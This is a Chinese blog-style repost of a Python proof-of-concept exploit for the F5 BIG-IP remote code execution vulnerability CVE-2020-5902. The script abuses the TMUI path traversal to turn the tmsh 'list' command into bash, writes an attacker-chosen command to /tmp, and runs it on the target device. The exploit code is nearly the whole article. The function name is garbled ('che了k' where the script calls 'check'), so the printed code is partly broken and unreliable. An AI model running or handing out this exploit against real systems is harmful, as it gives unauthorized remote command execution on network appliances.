欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

F5 BIG-IP远程代码执行漏洞(CVE-2020-5902)POC

程序员文章站 2024-03-24 19:21:10
...

https://downloads.f5.com/trial/

F5 BIG-IP远程代码执行漏洞(CVE-2020-5902)POC

 

import requests   #by 斯文
import sys
import json
requests.packages.urllib3.disable_warnings()

banner= '''
   ______     _______     ____   ___ ____   ___       ____  ___   ___ ____  
  / ___\ \   / / ____|   |___ \ / _ \___ \ / _ \     | ___|/ _ \ / _ \___ \ 
 | |    \ \ / /|  _| _____ __) | | | |__) | | | |____|___ \ (_) | | | |__) |
 | |___  \ V / | |__|_____/ __/| |_| / __/| |_| |_____|__) \__, | |_| / __/ 
  \____|  \_/  |_____|   |_____|\___/_____|\___/     |____/  /_/ \___/_____|                                                 
  
                                                        by Liuyangjun
'''

headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
}

def che了k(url, cmd):
    try:
        print('[+ 开始测试目标: {}  命令: {}'.format(url,cmd))

        del_alias = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
        creat_alias = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'
        write_bash = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/checksafe&content={}'.format(cmd)
        exec_bash = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/checksafe'
        print('[+ 正在还原alias设置,防止其他人未修改回来了')
        x = requests.get(del_alias,headers=headers,verify=False,timeout=30)
        print('[+ 正在将list命令劫持为bash')
        y = requests.get(creat_alias,headers=headers,verify=False,timeout=30)
        print('[+ 正在写入bash文件')
        z = requests.get(write_bash,headers=headers,verify=False,timeout=30)
        print('[+ 正在执行命令,请查看output字段值'+'\n')
        g = requests.get(exec_bash,headers=headers,verify=False,timeout=30)
        requests.get(del_alias,headers=headers,verify=False,timeout=30)
        text = g.content.decode('utf-8')
        print(text.strip('\n'))
    except:
        print('[- 请查看目标是否可以正常访问')
if __name__ == "__main__":
    try:
        url = sys.argv[1]
        cmd = sys.argv[2]
        if url[-1] == '/':url=url[0:-1]
        print(banner)
        check(url=url,cmd=cmd)

    except Exception as e:
        # print(e)
        print('python3 CVE-2020-5902.py http://x.x.x.x  whoami')

 

相关标签: 安全测试类

上一篇: Python + Flask 项目开发实践系列《一》

下一篇: Web中间件之Nginx篇

推荐阅读